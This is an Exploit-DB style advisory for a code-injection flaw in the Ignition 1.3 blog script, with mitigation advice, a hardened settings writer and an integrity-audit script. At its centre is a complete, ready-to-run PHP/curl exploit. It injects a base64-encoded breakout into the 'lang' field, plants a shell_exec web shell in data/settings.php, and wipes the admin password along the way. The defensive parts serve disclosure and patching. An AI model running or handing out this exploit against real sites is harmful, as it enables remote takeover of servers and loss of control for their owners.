Vendor: Ignition
By: cOndemned
CVSS: 7.5 (HIGH)
Type: Remote Code Execution
CWE: 94
Product Name: Ignition
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit: Not mentioned
Other Scripts: Not mentioned
Platforms Tested: Not mentioned

Ignition 1.3 Remote Code Execution Exploit

Ignition 1.3 is vulnerable to remote code execution. Its settings handler, i-options.php, regenerates data/settings.php as PHP source: every POST field (pass, uri, suri, title, description, id, author, skin, gravatar, twitter, identica, book, game, lang) is concatenated straight into a double-quoted string literal with no escaping, and the handler as shown performs no authorization check beyond session_start(). A single POST request whose field value contains a double quote therefore closes the literal and appends arbitrary PHP, which runs every time settings.php is loaded. The same write replaces the stored admin password, and the unchecked lang value reaches require_once("lang/$language.php"), which also gives local file inclusion.

Mitigation:

No patched release is listed. Until one exists: restrict i-options.php to authenticated administrators (or remove it from the web root once the blog is configured); stop generating PHP source from request data, either by storing settings as data (JSON, ini) or by emitting each value with var_export() so quotes and semicolons stay inside the literal; and validate lang against an allow-list of the shipped language files before it reaches require_once. On existing installations, inspect data/settings.php for anything other than the plain assignments and two require_once lines of the template.
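The following is an added illustration, not Ignition's code and not part of cOndemned's exploit: the writer pattern from i-options.php beside a hardened replacement. It stands in $_POST and $_SESSION with plain arrays so it runs from the php CLI with no web server; the 'admin' session flag, the use of password_hash(), and the ['en'] language allow-list are assumptions made here, not behaviour of the project.

```php
<?php
// Added example, not Ignition's own code: the settings-writer pattern from
// i-options.php next to a hardened replacement. $_POST and $_SESSION are
// stood in by plain arrays so it runs offline; the 'admin' session flag,
// the password_hash() choice and the ['en'] allow-list are assumptions.

// Vulnerable pattern, as in the quoted i-options.php: request data is
// concatenated straight into PHP source, so a double quote in any field
// ends the string literal and whatever follows is parsed as code.
function build_settings_vulnerable(array $post): string
{
    return '<?php $pass = "' . ($post['pass'] ?? '') . '";' . "\n"
         . '$description = "' . ($post['description'] ?? '') . '";' . "\n"
         . '$language = "' . ($post['lang'] ?? '') . '";' . "\n";
}

// Hardened pattern: require an authenticated admin, allow-list the language
// (it is later used as a path in require_once("lang/$language.php")), and
// emit every value through var_export(), which yields a correctly escaped
// single-quoted PHP literal in which quotes and semicolons stay inert data.
function build_settings_hardened(array $post, array $session, array $allowed = ['en']): string
{
    if (empty($session['admin'])) {                       // assumed session flag
        throw new RuntimeException('settings change requires an authenticated admin');
    }
    $lang = (string)($post['lang'] ?? 'en');
    if (!in_array($lang, $allowed, true)) {
        throw new InvalidArgumentException("language not in allow-list: $lang");
    }
    $pass = password_hash((string)($post['pass'] ?? ''), PASSWORD_DEFAULT);
    $out  = "<?php\n";
    $out .= '$pass = ' . var_export($pass, true) . ";\n";
    $out .= '$description = ' . var_export((string)($post['description'] ?? ''), true) . ";\n";
    $out .= '$language = ' . var_export($lang, true) . ";\n";
    return $out;
}

// Constructed request. The PoC's breakout is placed in the description field,
// which the allow-list does not cover, so var_export() alone has to neutralise it.
$payload = 'x";echo @shell_exec($_GET[\'cmd\']);$wtf="';
$post    = ['pass' => 'secret', 'description' => $payload, 'lang' => 'en', 'submit' => 1];

echo "--- vulnerable settings.php ---\n", build_settings_vulnerable($post), "\n";
echo "--- hardened settings.php ---\n", build_settings_hardened($post, ['admin' => true]), "\n";

// Load the hardened file and confirm the payload survived only as a string value:
// true when the data is intact and nothing in it was executed.
$tmp = tempnam(sys_get_temp_dir(), 'settings');
file_put_contents($tmp, build_settings_hardened($post, ['admin' => true]));
require $tmp;
unlink($tmp);
var_dump($description === $payload);

// The PoC's real payload, sent in lang, is rejected before any file is written.
try {
    build_settings_hardened(['lang' => 'en";echo @shell_exec($_GET[\'cmd\']);$wtf="'], ['admin' => true]);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Run it with `php` from the command line. The vulnerable output shows the description value already parsed as three statements; the hardened output shows the same bytes sitting inside one single-quoted literal, which is why including the generated file yields the original string rather than a shell.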

Exploit-DB raw data:

<?php

/*

Ignition 1.3 Remote Code Execution Exploit
by cOndemned
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz


source of i-options.php

	1.	<?php
	2.	session_start();
	3.	if ($_POST['submit']) {
	4.	if ($FH = @fopen('data/settings.php', 'w')) {
	5.		@fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
	6.	$uri = "'.$_POST['uri'].'";
	7.	$suri = "'.$_POST['suri'].'";
	8.	$blogtitle = "'.$_POST['title'].'";
	9.	$description = "'.$_POST['description'].'";
	10.	$postid = "'.$_POST['id'].'";
	11.	$author = "'.$_POST['author'].'";
	12.	$skin = "'.$_POST['skin'].'";
	13.	$gravatar = "'.$_POST['gravatar'].'";
	14.	$twitter = "' . $_POST['twitter'] . '";
	15.	$identica = "' . $_POST['identica'] . '";
	16.	$book = "' . $_POST['book'] . '";
	17.	$game = "' . $_POST['game'] . '";
	18.	$language = "' . $_POST['lang'] . '";
	19.	
	20.	require_once("template.php");
	21.	require_once("lang/$language.php");');
	22.		#fclose($FH);
	23.	}

We can overwrite settings.php by simply sending a specially crafted POST request
and putting some evil code into one of the variables. After running my PoC, the line with
the $language var will be:

	$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";

Where "en" is the default language; without filling this field correctly the admin
will see an error while trying to access the blog index.

other attack scenarios:

	- attacker can use the $_POST['lang'] variable to exploit Local File
	Inclusion (lines 18 and 21)

	- fill $_POST['pass'] with a new password (md5 hashed) to overwrite the admin's
	password

	- etc...
*/


// Base URL of the target Ignition install (no trailing slash; it is joined below).
$target = 'http://localhost/ignition';

// Only the fields needed for a settings.php that still parses are supplied.
// Every field the handler reads but we leave out is written as an empty
// string, so the stored admin password ($pass) is emptied as a side effect.
$post = array
(
	'uri'		=> $target,
	'suri'		=> $target,
	'description'	=> 'Just another lame php blog script owned :<',
	'skin'		=> 'default',
	// decodes to:  en";echo @shell_exec($_GET['cmd']);$wtf="
	// the template's own closing '";' completes $wtf, leaving valid PHP
	'lang'		=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
	'submit'	=> 1
);

$sock = curl_init();

curl_setopt_array
(
	$sock, 
	array
	(
		CURLOPT_URL 		=> "$target/i-options.php",
		CURLOPT_RETURNTRANSFER	=> true,
		CURLOPT_POST		=> true,
		CURLOPT_POSTFIELDS	=> http_build_query($post)
	)
);

if (curl_exec($sock) === false) {
	die('request failed: ' . curl_error($sock) . "\n");
}
curl_close($sock);

// settings.php is now a web shell: the echo runs before its require_once lines.
echo "Check: $target/data/settings.php?cmd=[system_command]\n";

?>
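For checking whether an installation has already been hit, here is an added example that is not part of the exploit above nor of Ignition: a tokenizer-based audit of data/settings.php. It relies only on what the quoted i-options.php template shows, namely that a legitimate file consists solely of `$name = "...";` assignments plus `require_once("template.php")` and `require_once("lang/$language.php")`. Any other statement shape, or any superglobal, means the file was rewritten with injected code. The sample files are constructed inline; the command-line path argument is an assumption of this script.

```php
<?php
// Added example, not part of the original exploit nor of Ignition: a
// tokenizer-based integrity check for data/settings.php, the file the PoC
// rewrites. Per the template in i-options.php, a clean file holds only
// `$name = "...";` assignments plus require_once("template.php") and
// require_once("lang/$language.php"); any other statement shape, or any
// superglobal, is evidence that injected code was written into the file.

// Token sequences (token_name() strings or single-character tokens, ';' excluded)
// describing the only statement shapes a clean settings.php contains.
const SETTINGS_STATEMENT_SHAPES = [
    ['T_VARIABLE', '=', 'T_CONSTANT_ENCAPSED_STRING'],
    ['T_REQUIRE_ONCE', '(', 'T_CONSTANT_ENCAPSED_STRING', ')'],
    ['T_REQUIRE_ONCE', '(', '"', 'T_ENCAPSED_AND_WHITESPACE', 'T_VARIABLE',
     'T_ENCAPSED_AND_WHITESPACE', '"', ')'],
];

/** Returns a list of findings; an empty list means the source matches the template. */
function audit_settings_source(string $source): array
{
    $findings = [];
    $shape = [];   // token kinds of the statement being read
    $text  = '';   // its source text, for the report
    $line  = 1;    // last line number seen (character tokens carry none)
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok)) {
            [$id, $str, $line] = $tok;
            if ($id === T_OPEN_TAG) {
                continue;
            }
            if ($id === T_WHITESPACE) {       // keep for the report, not for the shape
                $text .= $str;
                continue;
            }
            if ($id === T_VARIABLE && strncmp($str, '$_', 2) === 0) {
                $findings[] = "line $line: superglobal $str has no business in a settings file";
            }
            $kind = token_name($id);
        } else {
            if ($tok === ';') {               // end of statement: compare against the template
                if (!in_array($shape, SETTINGS_STATEMENT_SHAPES, true)) {
                    $findings[] = "line $line: statement outside the template: " . trim($text) . ';';
                }
                $shape = [];
                $text  = '';
                continue;
            }
            $kind = $str = $tok;
        }
        $shape[] = $kind;
        $text   .= $str;
    }
    if ($shape !== []) {
        $findings[] = "trailing tokens without a terminating ';': " . trim($text);
    }
    return $findings;
}

// Constructed samples: a file shaped like the template, and the same file after
// the PoC's `lang` payload has been written into it.
$clean = <<<'PHP'
<?php $pass = "abc123";
$uri = "http://localhost/ignition/";
$language = "en";

require_once("template.php");
require_once("lang/$language.php");
PHP;
$injected = str_replace('$language = "en";',
    '$language = "en";echo @shell_exec($_GET[\'cmd\']);$wtf="";', $clean);

// With a path argument, audit a real file (php audit.php /var/www/ignition/data/settings.php);
// otherwise run against the constructed samples. Exit status 1 if anything is flagged.
$inputs = $argc > 1 ? [$argv[1] => (string)file_get_contents($argv[1])]
                    : ['clean sample' => $clean, 'injected sample' => $injected];
$dirty = 0;
foreach ($inputs as $name => $src) {
    $findings = audit_settings_source($src);
    $dirty   += $findings ? 1 : 0;
    echo "$name: ", $findings ? "INJECTED CODE\n  " . implode("\n  ", $findings) : 'clean', "\n";
}
exit($dirty ? 1 : 0);
```

The check is deliberately a whitelist of statement shapes rather than a search for strings such as shell_exec: the attacker controls every byte after the breakout, so a denylist is trivially evaded, whereas the template leaves no room for any statement other than the assignments and the two includes. The superglobal check catches the common case of a webshell reading its command from $_GET or $_POST even when the rest of the statement happens to look benign.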